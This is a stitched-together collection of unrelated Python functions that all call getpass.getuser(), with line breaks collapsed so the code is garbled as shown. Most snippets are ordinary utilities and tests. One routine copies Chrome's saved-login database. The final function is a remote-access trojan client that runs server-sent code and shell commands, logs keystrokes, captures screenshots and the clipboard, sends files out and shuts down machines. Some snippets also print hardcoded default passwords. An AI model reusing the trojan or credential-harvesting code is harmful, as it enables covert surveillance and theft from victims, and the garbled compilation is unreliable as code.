def getCloudPath(): if platform == "linux2": return "/home/%s/Google Drive/" % getuser() elif platform == "darwin": return "/Users/%s/Google Drive/" % getuser() else: raise Exception("Unsupported OS %s" % sys.platform)
def store(self, sender, reciever, message): if not self.owner: if 'filepermissions' in config and 'owner' in config['filepermissions']: self.owner = config['filepermissions']['owner'] else: self.owner = getpass.getuser() if not self.group: if 'filepermissions' in config and 'group' in config['filepermissions']: self.group = config['filepermissions']['group'] else: self.group = getpass.getuser() print('Mail will be stored as {}.{}'.format(self.owner, self.group)) if not self.uid: self.uid = pwd.getpwnam(self.owner).pw_uid if not self.gid: self.gid = grp.getgrnam(self.group).gr_gid chown(self.path, self.uid, self.gid) destination = '{}/{}.mail'.format(self.path, generate_UID()) log('Stored mail from {} to reciever {} under \'{}\''.format(sender, reciever, destination), product='slimSMTP', handler='storage_maildir', level=3) with open(destination, 'wb') as mail: mail.write(message) chown(destination, self.uid, self.gid) return True
def _set_data(self, data): """ Portions of the job spec should be generated by the system here (each time new data is loaded) """ now = str(datetime.datetime.now()) self._job_data = data if not data.get('uuid', False): self._job_data['uuid'] = JobSpec.new_uuid() self._job_data['date'] = now self._job_data['version'] = rrt.get_version() self._job_data['user'] = getpass.getuser() self._job_data['logs'] = os.path.join(JOB_LOGS_UNC, getpass.getuser(), self._job_data['uuid'], self._job_data['title']+'.*.txt') for k in ['renderer', 'title', 'project', 'scene', 'start', 'end', 'step', 'output']: if not self._job_data.get(k, False): raise JobSpecError("%s cannot be blank." % k) try: self._job_data['net_share'] = get_share(self._job_data['project']) except Exception: raise JobSpecError("Can't find network share for project '%s'." % self._job_data['project']) try: self._job_data['net_drive'] = os.path.splitdrive(self._job_data['project'])[0] except Exception: raise JobSpecError("Can't find drive letter in project path: '%s'" % self._job_data['project'])
def run(): receiver = socket(AF_INET, SOCK_STREAM) receiver.connect((HOST, 6666)) messages = [] term = Terminal() input = [sys.stdin, receiver] receiver.send(bytes("USERNAME "+getpass.getuser(), 'utf-8')) print(term.clear) while True: inputready, outputready, exceptready = select(input, [], []) quit = False for s in inputready: if s == receiver: data, addr = receiver.recvfrom(1024) messages.append(data.decode('utf-8')) drawBoard(term, messages) elif s == sys.stdin: msg = sys.stdin.readline() msg = msg.split("\n") if msg[0] == "!quit": quit = True break messages.append("<"+getpass.getuser()+"> "+msg[0]) receiver.send(bytes(msg[0], 'utf-8')) drawBoard(term,messages) if quit: break receiver.close() print(term.clear)
def parse_options(): global g_verbose parser = OptionParser(usage='usage: %prog [options] <ssh-server>[:<server-port>]', version='%prog 1.0', description=HELP) parser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True, help='squelch all informational output') parser.add_option('-p', '--remote-port', action='store', type='int', dest='port', default=DEFAULT_PORT, help='port on server to forward (default: %d)' % DEFAULT_PORT) parser.add_option('-u', '--user', action='store', type='string', dest='user', default=getpass.getuser(), help='username for SSH authentication (default: %s)' % getpass.getuser()) parser.add_option('-K', '--key', action='store', type='string', dest='keyfile', default=None, help='private key file to use for SSH authentication') parser.add_option('', '--no-key', action='store_false', dest='look_for_keys', default=True, help='don\'t look for or use a private key file') parser.add_option('-P', '--password', action='store_true', dest='readpass', default=False, help='read password (for key or password auth) from stdin') parser.add_option('-r', '--remote', action='store', type='string', dest='remote', default=None, metavar='host:port', help='remote host and port to forward to') options, args = parser.parse_args() if len(args) != 1: parser.error('Incorrect number of arguments.') if options.remote is None: parser.error('Remote address required (-r).') g_verbose = options.verbose server_host, server_port = get_host_port(args[0], SSH_PORT) remote_host, remote_port = get_host_port(options.remote, SSH_PORT) return options, (server_host, server_port), (remote_host, remote_port)
def _teardown(self, config, temp): # Picard creates a folder named after the user in the temp-root try_rmtree(os.path.join(temp, getpass.getuser())) # Some JREs may create a folder for temporary performance counters try_rmtree(os.path.join(temp, "hsperfdata_" + getpass.getuser())) CommandNode._teardown(self, config, temp)
def fix_missing_spark_user(cl, prog, params): """Adjust /etc/passwd and GATK parameters if current username missing. Set Spark user to avoid lookup errors on environments like Docker where we run as a user id that is not present in /etc/passwd https://stackoverflow.com/questions/45198252/apache-spark-standalone-for-anonymous-uid-without-user-name/45361221#45361221 https://github.com/jaceklaskowski/mastering-apache-spark-book/blob/master/spark-sparkcontext-creating-instance-internals.adoc#-utilsgetcurrentusername https://blog.openshift.com/jupyter-on-openshift-part-6-running-as-an-assigned-user-id/ """ if prog.find("Spark") >= 0 or "--spark-master" in params: user = None try: user = getpass.getuser() except KeyError: if os.access("/etc/passwd", os.W_OK): with open("/etc/passwd", "a") as out_handle: out_handle.write("sparkanon:x:{uid}:{uid}:sparkanon:/nonexistent:/usr/sbin/nologin\n" .format(uid=os.getuid())) try: user = getpass.getuser() except KeyError: pass if user: cl = "export SPARK_USER=%s && " % (user) + cl return cl
def __get_file_paths(): return [ r'C:\Documents and Settings\{!s}\My Documents\My Music\iTunes\\'.format( getpass.getuser() ), r'C:\Users\{!s}\Music\iTunes\\'.format( getpass.getuser() ), r'C:\Users\{!s}\My Music\iTunes\\'.format( getpass.getuser() ), r'C:\Users\{!s}\My Music\iTunes\\'.format( getpass.getuser() ), ]
def compile_macro(config,macro): """ Creates the library from a macro using CINT compiling it in scratch to avoid problems with the linking in the working nodes. Args: config: configuration file where the macro path is specified macro: macro name to be compiled Returns: nothing """ submitDir = os.getcwd() _macro=macro+'.h' library = config.get(macro,'library') libDir=os.path.dirname(library) os.chdir(libDir) if not os.path.exists(library): print '@INFO: Compiling ' + _macro scratchDir='/scratch/%s/'%(getpass.getuser()) # shutil.copyfile(libDir+'/'+_macro,'/scratch/%s/%s'%(getpass.getuser(),_macro)) os.system("cp "+libDir+'/* /scratch/%s/'%(getpass.getuser())) # OTHERWISE WILL NOT COMPILE SINCE INCLUDES OTHER FILES!!! os.chdir(scratchDir) ROOT.gROOT.ProcessLine('.L %s+'%(scratchDir+_macro)) # CRASHES WHILE COMPILING THE SECOND ONE... # ROOT.gSystem.CompileMacro('%s'%(scratchDir+_macro)) # THIS AS WELL... # print("gcc -shared -o "+library+" `root-config --glibs --libs --cflags` -fPIC "+scratchDir+_macro) # os.system("gcc -shared -o "+library+" `root-config --glibs --libs --cflags` -fPIC "+scratchDir+_macro) shutil.copyfile('/scratch/%s/%s'%(getpass.getuser(),os.path.basename(library)),library) os.chdir(submitDir)
def SaveAs(p, savePath, saveName, saveFormats, verbose=True): ''' ''' Verbose("Saving plots in %s format(s)" % (len(saveFormats)), True) if verbose: Print("Saving plots in %s format(s)" % (len(saveFormats)), True) # For-loop: All formats to save file for ext in saveFormats: sName = saveName + ext # Change print name if saved under html if "html" in sName: user = getpass.getuser() initial = getpass.getuser()[0] sName = sName.replace("/afs/cern.ch/user/%s/" % (initial), "http://cmsdoc.cern.ch/~") sName = sName.replace("%s/public/html/" % (user), "%s/" % (user)) # Print save name print "\t", sName # Check if dir exists if not os.path.exists(savePath): os.mkdir(savePath) # Save the plots p.saveAs(saveName, saveFormats) return
def run(self, software_name = None): database_path = '' homedrive = '' homepath = '' if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ: homedrive = os.environ.get('HOMEDRIVE') homepath = os.environ.get('HOMEPATH') # All possible path pathTab = [ homedrive + homepath + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data', homedrive + homepath + '\AppData\Local\Google\Chrome\User Data\Default\Login Data', homedrive + '\Users\\' + getpass.getuser() + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data', homedrive + '\Users\\' + getpass.getuser() + '\AppData\Local\Google\Chrome\User Data\Default\Login Data', 'C:\Users\\' + getpass.getuser() + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data', 'C:\Users\\' + getpass.getuser() + '\AppData\Local\Google\Chrome\User Data\Default\Login Data' ] database_path = [p for p in pathTab if os.path.exists(p)] if not database_path: print_debug('INFO', 'Google Chrome not installed.') return # if many path are valid if len(database_path) !=1: database_path = database_path[0] # Copy database before to query it (bypass lock errors) try: shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db') database_path = os.getcwd() + os.sep + 'tmp_db' except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'An error occured copying the database file')
def test_expand_path(self): """ Exercises the expand_path() method with actual runtime data. """ # Some of the following tests get confused when ran as root. For instance, # in my case... # # >>> os.path.expanduser("~") # '/home/atagar' # # >>> os.path.expanduser("~root") # '/root' if getpass.getuser() == 'root': test.runner.skip(self, "(running as root)") return self.assertEquals(os.getcwd(), stem.util.system.expand_path(".")) self.assertEquals(os.getcwd(), stem.util.system.expand_path("./")) self.assertEquals(os.path.join(os.getcwd(), "foo"), stem.util.system.expand_path("./foo")) home_dir, username = os.path.expanduser("~"), getpass.getuser() self.assertEquals(home_dir, stem.util.system.expand_path("~")) self.assertEquals(home_dir, stem.util.system.expand_path("~/")) self.assertEquals(home_dir, stem.util.system.expand_path("~%s" % username)) self.assertEquals(os.path.join(home_dir, "foo"), stem.util.system.expand_path("~%s/foo" % username))
def defaults(environ = os.environ): """ Produce the defaults based on the existing configuration. """ user = getuser() or 'postgres' userdir = os.path.expanduser('~' + user) or '/dev/null' pgdata = os.path.join(userdir, pg_home_directory) yield ('user',), getuser() yield ('host',), default_host yield ('port',), default_port # If appdata is available, override the pgdata and pgpassfile # configuration settings. if sys.platform == 'win32': appdata = environ.get('APPDATA') if appdata: pgdata = os.path.join(appdata, pg_appdata_directory) pgpassfile = os.path.join(pgdata, pg_appdata_passfile) else: pgpassfile = os.path.join(userdir, pg_home_passfile) for k, v in ( ('sslcrtfile', os.path.join(pgdata, 'postgresql.crt')), ('sslkeyfile', os.path.join(pgdata, 'postgresql.key')), ('sslrootcrtfile', os.path.join(pgdata, 'root.crt')), ('sslrootcrlfile', os.path.join(pgdata, 'root.crl')), ('pgpassfile', pgpassfile), ): if os.path.exists(v): yield (k,), v
def readSettingsOnStart(self): settings = self.settings settings.setValue('lastSession/exitStatus', settings.value('currentSession/exitStatus', u'ok')) settings.setValue('lastSession/fileName', settings.value('currentSession/fileName', None)) settings.setValue('lastSession/bakFileName', settings.value('currentSession/bakFileName', None)) settings.setValue('lastSession/user', settings.value('currentSession/user', getpass.getuser())) settings.setValue('currentSession/exitStatus', u'crash') settings.setValue('currentSession/fileName', None) settings.setValue('currentSession/bakFileName', None) settings.setValue('currentSession/changesUnsaved', False) settings.setValue('currentSession/user', getpass.getuser()) # restore GUI settings if the config file was previously generated by the same user if settings.value('currentSession/user') != settings.value('lastSession/user') and settings.value('lastSession/user') is not None: return self.win.resize(settings.value('mainwindow/size', QtCore.QSize(800, 800))) self.win.move(settings.value('mainwindow/pos', QtCore.QPoint(400, 400))) self.win.splitter.setSizes(settings.value('mainwindow/splitter_sizes', [150, 500])) if settings.value('mainwindow/state') is not None: self.win.restoreState(settings.value('mainwindow/state')) #if settings.value('mainwindow/geometry_nodelibrary_dockwidget') is not None: # self.win.dockWidget.setGeometry(settings.value('mainwindow/geometry_nodelibrary_dockwidget')) #if settings.value('mainwindow/geometry_nodecontrol_dockwidget') is not None: # self.win.dockWidget_2.setGeometry(settings.value('mainwindow/geometry_nodecontrol_dockwidget')) if settings.value('mainwindow/fullScreen', False) is True: self.win.showFullScreen() #self.updateRecentFileActions() #>>> is moved to INIT of MainWindow since actions are not inited yet logger.info('Settings file loaded [{0}]'.format(settings.fileName()))
def __init__(self): # building path config.appliance_url = "https://conjur-dev-master.d1.opendns.com/api" config.account = "dev" config.cert_file = "/Users/" + getpass.getuser() + "/.conjur/conjur-dev.pem" self.conjurapi = conjur.new_from_netrc("/Users/" + getpass.getuser() + "/.netrc", config=config) print getpass.getuser()
def dispatch(self, event): mh = getToolByName(self, 'MailHost') portal = getToolByName(self, 'portal_url').getPortalObject() host = getattr(self, 'REQUEST', {}).get('HTTP_HOST', socket.getfqdn()) data = {'host': host} data.update(event.data) data.update({'subject': event.subject, 'level': event.level, 'message': event.message, 'data': event.data}) subject = (self.subject_format or self.default_subject_format) % data message = (self.message_format or self.default_message_format) % data failover_mail_host = data['host'].split(':', 1)[0] mail_to = self.mail_to or \ portal.getProperty('email_from_address') or \ '%s@%s' % (getpass.getuser(), failover_mail_host) mail_from = self.mail_from or \ portal.getProperty('email_from_address') or \ '%s@%s' % (getpass.getuser(), failover_mail_host) try: mh.send(message, mail_to, mail_from, subject, immediate=True) except: #TODO pass
def generate_log(log, what2log): if not os.path.isfile(log): with open(log,"wb") as fo: fo.write(time.strftime("%Y-%m-%dT%H:%M:%S ") + getpass.getuser() + ' ' + what2log + ' \n') else: with open(log,"ab") as fo: fo.write(time.strftime("%Y-%m-%dT%H:%M:%S ") + getpass.getuser() + ' ' + what2log + ' \n')
def setUp(self): self.__hadoopConfig = hadoopConfig() self.rootDir = '/tmp/hod-%s' % getpass.getuser() if not os.path.exists(self.rootDir): os.mkdir(self.rootDir) self.testingDir = tempfile.mkdtemp( dir=self.rootDir, prefix='HadoopTestSuite.test_hadoopConfig') self.confDir = tempfile.mkdtemp(dir=self.rootDir, prefix='HadoopTestSuite.test_hadoopConfig') self.tempDir = '/tmp/hod-%s/something' % getpass.getuser() self.hadoopSite = os.path.join(self.confDir,'hadoop-site.xml') self.numNodes = 4 self.hdfsAddr = 'nosuchhost1.apache.org:50505' self.mapredAddr = 'nosuchhost2.apache.org:50506' self.finalServerParams = { 'mapred.child.java.opts' : '-Xmx1024m', 'mapred.compress.map.output' : 'false', } self.serverParams = { 'mapred.userlog.limit' : '200', 'mapred.userlog.retain.hours' : '10', 'mapred.reduce.parallel.copies' : '20', } self.clientParams = { 'mapred.tasktracker.tasks.maximum' : '2', 'io.sort.factor' : '100', 'io.sort.mb' : '200', 'mapred.userlog.limit.kb' : '1024', 'io.file.buffer.size' : '262144', } self.clusterFactor = 1.9 self.mySysDir = '/user/' + getpass.getuser() + '/mapredsystem' pass
def downloadYouTube(self, path, url): username = getpass.getuser() try: os.mkdir("/home/" + username + "/temp") except: pass os.chdir("/home/" + getpass.getuser() + "/temp") dirname = str(random.getrandbits(128)) try: os.mkdir(dirname) except: pass os.chdir(dirname) with youtube_dl.YoutubeDL(self.ydl_opts) as ydl: ydl.download([url]) for fil in os.listdir(): shutil.move(fil, path + "/" + fil) os.chdir("/home/" + username + "/temp") shutil.rmtree(dirname)
def test_run_daemon(self): sample_conf = "[my-daemon]\nuser = %s\n" % getuser() with tmpfile(sample_conf) as conf_file: with mock.patch.dict('os.environ', {'TZ': ''}): with mock.patch('time.tzset') as mock_tzset: daemon.run_daemon(MyDaemon, conf_file) self.assertTrue(MyDaemon.forever_called) self.assertEqual(os.environ['TZ'], 'UTC+0') self.assertEqual(mock_tzset.mock_calls, [mock.call()]) daemon.run_daemon(MyDaemon, conf_file, once=True) self.assertEqual(MyDaemon.once_called, True) # test raise in daemon code with mock.patch.object(MyDaemon, 'run_once', MyDaemon.run_raise): self.assertRaises(OSError, daemon.run_daemon, MyDaemon, conf_file, once=True) # test user quit sio = StringIO() logger = logging.getLogger('server') logger.addHandler(logging.StreamHandler(sio)) logger = utils.get_logger(None, 'server', log_route='server') with mock.patch.object(MyDaemon, 'run_forever', MyDaemon.run_quit): daemon.run_daemon(MyDaemon, conf_file, logger=logger) self.assertTrue('user quit' in sio.getvalue().lower()) # test missing section sample_conf = "[default]\nuser = %s\n" % getuser() with tmpfile(sample_conf) as conf_file: self.assertRaisesRegexp(SystemExit, 'Unable to find my-daemon ' 'config section in.*', daemon.run_daemon, MyDaemon, conf_file, once=True)
def __init__(self, cloud_num, nodes_per_cloud, node_num, cloud_name, h2o_jar, ip, base_port, xmx, output_dir, isEC2): """ Create a node in a cloud. @param cloud_num: Dense 0-based cloud index number. @param nodes_per_cloud: How many H2O java instances are in a cloud. Clouds are symmetric. @param node_num: This node's dense 0-based node index number. @param cloud_name: The H2O -name command-line argument. @param h2o_jar: Path to H2O jar file. @param base_port: The starting port number we are trying to get our nodes to listen on. @param xmx: Java memory parameter. @param output_dir: The directory where we can create an output file for this process. @param isEC2: Whether or not this node is an EC2 node. @return: The node object. """ self.cloud_num = cloud_num self.nodes_per_cloud = nodes_per_cloud self.node_num = node_num self.cloud_name = cloud_name self.h2o_jar = h2o_jar self.ip = ip self.base_port = base_port self.xmx = xmx self.output_dir = output_dir self.isEC2 = isEC2 self.addr = self.ip self.http_addr = self.ip self.username = getpass.getuser() self.password = getpass.getuser() if self.isEC2: self.username = '******' self.password = None self.ssh = paramiko.SSHClient() policy = paramiko.AutoAddPolicy() self.ssh.set_missing_host_key_policy(policy) self.ssh.load_system_host_keys() if self.password is None: self.ssh.connect(self.addr, username=self.username) else: self.ssh.connect(self.addr, username=self.username, password=self.password) # keep connection - send keepalive packet evety 5minutes self.ssh.get_transport().set_keepalive(300) self.uploaded = {} self.port = -1 self.output_file_name = "" self.error_file_name = "" self.terminated = False # Choose my base port number here. All math is done here. Every node has the same # base_port and calculates it's own my_base_port. ports_per_node = 2 self.my_base_port = \ int(self.base_port) + \ int(self.cloud_num * self.nodes_per_cloud * ports_per_node) + \ int(self.node_num * ports_per_node)
def _get_user_identity(self): """Determine the identity to use for new commits. """ user = os.environ.get("GIT_COMMITTER_NAME") email = os.environ.get("GIT_COMMITTER_EMAIL") config = self.get_config_stack() if user is None: try: user = config.get(("user", ), "name") except KeyError: user = None if email is None: try: email = config.get(("user", ), "email") except KeyError: email = None if user is None: import getpass user = getpass.getuser().encode(sys.getdefaultencoding()) if email is None: import getpass import socket email = ("{}@{}".format(getpass.getuser(), socket.gethostname()) .encode(sys.getdefaultencoding())) return (user + b" <" + email + b">")
def get_info(): #accumulo print hilite(" ~==:..=======:,, ", False, True) print hilite(" ========...====.==:::==~======.... ", False, True) print hilite(" ===..==.....==..:=.........===========. ", False, True) print hilite(" ===...=......==.............==,==.....==. ", False, True) print hilite(" ====,...:......==..............==.=......==.. ", False, True) print hilite(" ,===============.=,...........=................=..~..===.=.... ", False, True) print hilite(" =...........,==...............,,.................=....,=.:.=..======~~. ", False, True) print hilite(" :............==.................=........................==,..==........=== ", False, True) print hilite("............=,.............................................=....==........=.= ", False, True) print hilite("..................................................................=,.........=. ", False, True) print hilite("Docker-Geomesa successfully deployed. Instance information is as follows... ", False, True) ireport = dc.inspect_container("tests-accumulo") host_port = ireport['NetworkSettings']['Ports'] print 'Namenode: http://' + remote_docker_daemon_host + ":" + host_port['50070/tcp'][0]['HostPort'] print 'Accumulo Monitor: http://' + remote_docker_daemon_host + ":" + host_port['50095/tcp'][0]['HostPort'] print 'Zookeeper: ' + remote_docker_daemon_host + ":" + host_port['2181/tcp'][0]['HostPort'] print 'Username: root\nPassword: toor' print 'Instance Name: docker_instance' print 'Data Volume: /home/' + getpass.getuser() + '/geomesa-docker-volumes/accumulo-data -> accumulo:/data-dir' print 'Dependency Volume: /home/' + getpass.getuser() + '/geomesa-docker-volumes/accumulo-libs -> accumulo:' \ '/opt/accumulo/accumulo-1.5.2/lib/ext/' #yarn ireport = dc.inspect_container("tests-yarn") host_port = ireport['NetworkSettings']['Ports'] print '\nYarn Resource Manager: http://' + remote_docker_daemon_host + ":" + host_port['8088/tcp'][0]['HostPort'] print 'Yarn Node Manager: http://' + remote_docker_daemon_host + ":" + host_port['8042/tcp'][0]['HostPort'] #geoserver ireport = dc.inspect_container("tests-geoserver") host_port = ireport['NetworkSettings']['Ports'] status = '\nGeoServer Web Admin: http://' + remote_docker_daemon_host + ':' + host_port['8080/tcp'][0]['HostPort']\ + '/geoserver/index.html' + '\nUsername: admin\nPassword: geoserver' print status
def __init__(self, access_key, secret_access_key, queue_name, revision=0, connection_kwargs={}): """:param connection_kwargs: arguments to be used when creating the underlying boto connection to aws""" logging.Handler.__init__(self) self._access_key = access_key self._secret_access_key = secret_access_key self._connection_kwargs = connection_kwargs self._queue_name = queue_name self._records_to_emit = [] self._queue = None self._connected = True self._threaded_timer = ThreadedTimer(1000, self) self._threaded_timer.start() try: if sys.platform.startswith('win'): # on windows getuser() uses the USERNAME env var # from sys.getfilesystemencoding documentation: # On Windows NT+, file names are Unicode natively, so no conversion is performed. # getfilesystemencoding() still returns 'mbcs', as this is the encoding that applications # should use when they explicitly want to convert Unicode strings # to byte strings that are equivalent when used as file names. self._user = getpass.getuser().decode('mbcs') else: self._user = getpass.getuser() except Exception: self._user = getpass.getuser().encode('ascii', 'ignore') self._revision = revision
def setUp(self): self.CUSTOM_BASE_DIR = '/tmp/new-cloudify-ctx' user = getpass.getuser() if user not in ['ubuntu', 'travis']: raise unittest.SkipTest() super(FabricPluginRealSSHTests, self).setUp() user = getpass.getuser() if user == 'travis': self.default_fabric_env = { 'host_string': 'localhost', 'user': '******', 'password': '******' } if user == 'ubuntu': self.default_fabric_env = { 'host_string': 'localhost', 'user': '******', 'key_filename': '/home/ubuntu/.ssh/build_key.rsa' } tasks.fabric_api = self.original_fabric_api with context_managers.settings(**self.default_fabric_env): if files.exists(tasks.DEFAULT_BASE_DIR): api.run('rm -rf {0}'.format(tasks.DEFAULT_BASE_DIR)) if files.exists(self.CUSTOM_BASE_DIR): api.run('rm -rf {0}'.format(self.CUSTOM_BASE_DIR))
def GetSavePath(**kwargs): ''' ''' HasKeys(["savePath", "analysis", "verbose"], **kwargs) savePath = kwargs.get("savePath") analysis = kwargs.get("analysis") verbose = kwargs.get("verbose") if verbose: print "\t--- Constructing path where plots will be saved" if savePath != None: return savePath # Get username and the initial of the username user = getpass.getuser() initial = getpass.getuser()[0] # Set the save path depending on the host if "lxplus" in socket.gethostname(): savePath = "/afs/cern.ch/user/%s/%s/public/html/%s/" % (initial, user, analysis) if "lpc" in socket.gethostname(): savePath = "/publicweb/%s/%s/%s/" % (initial, user, analysis) else: savePath = "/Users/%s/Desktop/Plots/" % (user) return savePath
def compareByKey(rdd_1,rdd_2): in_a_not_in_b = rdd_1.subtractByKey(rdd_2) in_b_not_in_a = rdd_2.subtractByKey(rdd_1) in_a_and_b = rdd_1.join(rdd_2) equal_seqs = in_a_and_b.filter(lambda x: x[1][0]==x[1][1]) diff_seqs = in_a_and_b.subtractByKey(equal_seqs) a = in_a_not_in_b.count() b = in_b_not_in_a.count() c = in_a_and_b.count() d = equal_seqs.count() e = diff_seqs.count() path_in_a_not_in_b = "/user/" + getpass.getuser() +"/output/" + "in_a_not_in_b" path_in_b_not_in_a = "/user/" + getpass.getuser() +"/output/" + "in_b_not_in_a" path_equal_seqs = "/user/" + getpass.getuser() +"/output/" + "equal_seqs" path_diff_seqs = "/user/" + getpass.getuser() +"/output/" + "diff_seqs" os.system("hadoop fs -rm -r output") os.system("hadoop fs -ls") os.system("hadoop fs -mkdir output") in_a_not_in_b.saveAsTextFile(path_in_a_not_in_b) in_b_not_in_a.saveAsTextFile(path_in_b_not_in_a) equal_seqs.saveAsTextFile(path_equal_seqs) diff_seqs.saveAsTextFile(path_diff_seqs) print ("\nComparison output saved in: " + "/user/" + getpass.getuser() +"/output/") print("\nids in A not in B = %d \nids in B not in A = %d \nids in A and in B = %d \nidentical id and sequence = %d \nidentical id but different sequence = %d" % (a,b,c,d,e)) return [a,b,c,d,e]
def add_arguments(cls, parser, defaults=None): """ Adds the arguments to an :class:`argparse.ArgumentParser` in order to create a database connection. """ defaults = defaults if defaults is not None else defaults default_host = defaults.get('host', "localhost") parser.add_argument( '--host', '-h', help="MySQL database host to connect to (defaults to {0})".format(default_host), default=default_host ) default_database = defaults.get('database', getpass.getuser()) parser.add_argument( '--database', '-d', help="MySQL database name to connect to (defaults to {0})".format(default_database), default=default_database ) default_defaults_file = defaults.get('defaults-file', os.path.expanduser("~/.my.cnf")) parser.add_argument( '--defaults-file', help="MySQL defaults file (defaults to {0})".format(default_defaults_file), default=default_defaults_file ) default_user = defaults.get('user', getpass.getuser()) parser.add_argument( '--user', '-u', help="MySQL user (defaults to %s)".format(default_user), default=default_user ) return parser
def serve_forever(): username = None password = None # Read the username and password from a config file. # If not present, prompt the user for their credentials. parser = ConfigParser.SafeConfigParser() path = os.path.expanduser('~/.beerbug/beerbug.ini') parser.read(path) if parser is not None: try: try: username = parser.get('google', 'username') except ConfigParser.NoOptionError: pass try: password = parser.get('google', 'password') except ConfigParser.NoOptionError: pass except ConfigParser.NoSectionError: pass if username is None: username = raw_input('Enter Google Docs username [' \ + getpass.getuser() + ']: ') if username.strip() == '': username = getpass.getuser() if password is None: password = getpass.getpass('Enter Google Docs password: ') serve(username, password)
def run(self): while True: username = raw_input('username(%s): ' % getpass.getuser()) if username == '': username = getpass.getuser() if not re.match(r'[A-Za-z\.0-9]+', username): print 'Invalid Username' else: break while True: email = raw_input('email: ') if not re.match(r'[A-Za-z\.0-9\+]+@\w+(\.\w+)*', email): print 'Invalid email' else: break while True: passwd = getpass.getpass('password: '******'repeat: ') if passwd != rpasswd: print 'Password not matching!' else: break from vilya.models.user import User user = User() user.username = username user.email = email user.admin = True user.active = True user.set_password(passwd) user.save() print 'Super user created!'
def receive_commands(self): """ Receives Commands from Server """ while True: data = json_loads(self.receive()) # data[0]: command # data[1]: data1 # data[2]: data2 # ... if data[0] == '<INFO>': self.send( json.dumps([ platform.system(), os.path.expanduser('~'), getpass.getuser() ]).encode()) continue if data[0] == '--i': self.send(b'<READY>') while 1: command = self.receive().decode() if command == '<QUIT>': self.send(b'Quitting Python Interpreter...') break old_stdout = sys.stdout redirected_output = sys.stdout = StringIO() try: exec(command) error = None except Exception as e: error = errors(e, line=False) finally: sys.stdout = old_stdout self.send( json.dumps([redirected_output.getvalue(), error]).encode()) continue if data[0] == '--x': if data[1] == '1': self.send(b'Restarting Session...') break if data[1] == '2': self.send(b'Disconnecting Client...') self.socket.close() sys.exit(0) if data[0] == '--q': if data[1] == '1': if platform.system() == 'Windows': self.send(b'Locked Client Machine') ctypes.windll.user32.LockWorkStation() else: self.send( b'Desktop Locking is only avaliable on Windows Clients.' ) continue elif data[1] == '2': if platform.system() == 'Windows': subprocess.Popen('shutdown /s /t 0', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) else: subprocess.Popen('shutdown -h now', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) elif data[1] == '3': if platform.system() == 'Windows': subprocess.Popen('shutdown /r /t 0', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) else: subprocess.Popen('reboot now', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(5) # If shutdowns or restarts didn't work break if data[0] == '--l': self.socket.send(b' ') continue if data[0] == '<LISTENING>': self.send(b'<DONE>') if data[0] == '--s': self.send(b'<RECEIVED>') with open(data[1], 'wb') as f: f.write(self.receive()) self.send(b'File Transfer Successful') continue if data[0] == '--d': try: r = requests.get(data[1]) with open(data[2], 'wb') as f: f.write(r.content) except Exception as e: self.send('Error downloading file: {}\n'.format( errors(e, line=False)).encode()) continue self.send(b'Download Successful') continue if data[0] == '--c': try: pyperclip.copy(data[1]) self.send(b'Copied Successfully') except Exception as e: self.send(errors(e).encode()) continue if data[0] == '--u': self.send('User: {}\nOS: {} {} ({})\n'.format( os.environ['USERNAME'], platform.system(), platform.release(), platform.platform()).encode()) continue if data[0] == '--g': if platform.system() == 'Windows': _file = '{}\\temp.png'.format(os.environ['TEMP']) else: _file = '{}/temp.png'.format(os.environ['HOME']) try: pyscreeze.screenshot(_file) except Exception as e: self.send(b'<ERROR>') self.receive() self.send(errors(e).encode()) continue with open(_file, 'rb') as f: self.send(f.read()) os.remove(_file) continue if data[0] == '--k start': if not _pynput: self.send(b'Keylogger is disabled due to import error.') if not KeyListener.running: KeyListener.start() self.send(b'Started Keylogger\n') continue self.send(b'Keylogger already running\n') continue if data[0] == '--k dump': if not _pynput: self.send(b'Keylogger is disabled due to import error.') global KeyboardLogs if not KeyListener.running: self.send(b'<NOTRUNNING>') else: self.send(KeyboardLogs.encode()) continue if data[0] == '--k stop': if not _pynput: self.send(b'Keylogger is disabled due to import error.') if KeyListener.running: KeyListener.stop() threading.Thread.__init__( KeyListener) # re-initialise thread KeyboardLogs = '' self.send(b'Keylogger Stopped') continue self.send(b'Keylogger not running') continue if data[0] == '--p': try: self.send(pyperclip.paste().encode()) except Exception as e: self.send(errors(e).encode()) continue if data[0] == '--r': filename = data[1] if not os.path.exists(filename): self.send(b'<TRANSFERERROR>') continue with open(filename, 'rb') as f: self.send(f.read()) continue if data[0] == '<GETCWD>': self.send(os.getcwdb()) continue if data[0] == 'cd': self.send(os.getcwdb()) continue if data[0][:2].lower() == 'cd' or data[0][:5] == 'chdir': if platform.system() == 'Windows': _pwd = ' & cd' else: _pwd = '; pwd' process = subprocess.Popen(data[0] + _pwd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) error = process.stderr.read().decode() if error == "": output = process.stdout.read().decode() newlines = output.count('\n') if newlines > 1: process = subprocess.Popen(data[0], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.send( json.dumps( ['<ERROR>', process.stdout.read().decode()]).encode()) else: os.chdir(output.replace('\n', '').replace('\r', '')) self.send(json.dumps([os.getcwd()]).encode()) else: self.send(json.dumps(['<ERROR>', error]).encode()) continue if len(data[0]) > 0: if data[0] == 'tree': data[0] = 'tree /A' process = subprocess.Popen(data[0], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) for line in iter(process.stdout.readline, ""): if line == b'': break self.send(line.replace(b'\n', b'')) if self.receive() == '--q': kill(process.pid) break self.send(process.stderr.read()) self.receive() self.send(b'<DONE>') continue
